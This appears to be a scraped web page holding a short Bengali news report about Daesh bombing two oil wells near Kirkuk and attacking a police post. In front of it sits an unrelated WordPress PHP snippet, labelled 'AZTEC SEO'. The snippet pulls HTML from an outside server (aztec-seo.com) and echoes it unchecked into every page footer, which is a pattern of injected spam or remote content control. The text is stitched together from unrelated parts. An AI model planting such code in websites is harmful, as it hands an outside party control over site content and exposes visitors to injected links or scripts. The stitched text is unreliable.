/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99);
ইরাকের উত্তরাঞ্চলীয় কিরকুক শহরের কাছে অবস্থিত দুটি তেলকূপে বোমা হামলা চালিয়েছে উগ্র তাকফিরি সন্ত্রাসী গোষ্ঠী দায়েশ। হামলার পর ওই এলাকায় আগুন ধরে যায়।
ইরাকের তেল বিষয়ক কয়েকটি সূত্র আজ (বুধবার) বার্তা সংস্থা রয়টার্সকে জানিয়েছে, বোমা হামলার কারণে বাই হাসান তেলেক্ষেত্রে কোনো প্রভাব পড়ে নি। তেলকূপের কাছে যে অগ্নিকাণ্ডের সূচনা হয়েছিল তাতে তেল উৎপাদনে বড় ধরনের বিঘ্ন সৃষ্টির আগেই দ্রুত নিয়ন্ত্রণে আনা সম্ভব হয়।
উগ্র সন্ত্রাসীরা পাশের একটি নিরাপত্তা পোস্টেও হামলা চালায়। এতে এক পুলিশ নিহত ও তিনজন আহত হয়েছে।
একটি নিরাপত্তা সূত্র বলছে, নিরাপত্তা পোস্টে হামলার অর্থ হচ্ছে- পুলিশকে এদিকে ব্যস্ত রেখে সন্ত্রাসীদেরকে পরিকল্পনা মতো ভেতরে ঢুকিয়ে তেলক্ষেত্রে বোমা হামলার সুযোগ করে দেয়া।
এদিকে, ইরাকের আস-সুমারিয়া টেলিভিশন চ্যানেল জানিয়েছে, বোমা হামলার পর দুটি কূপেই তেল উত্তোলন বন্ধ ছিল। সূত্র : পার্সটুডেv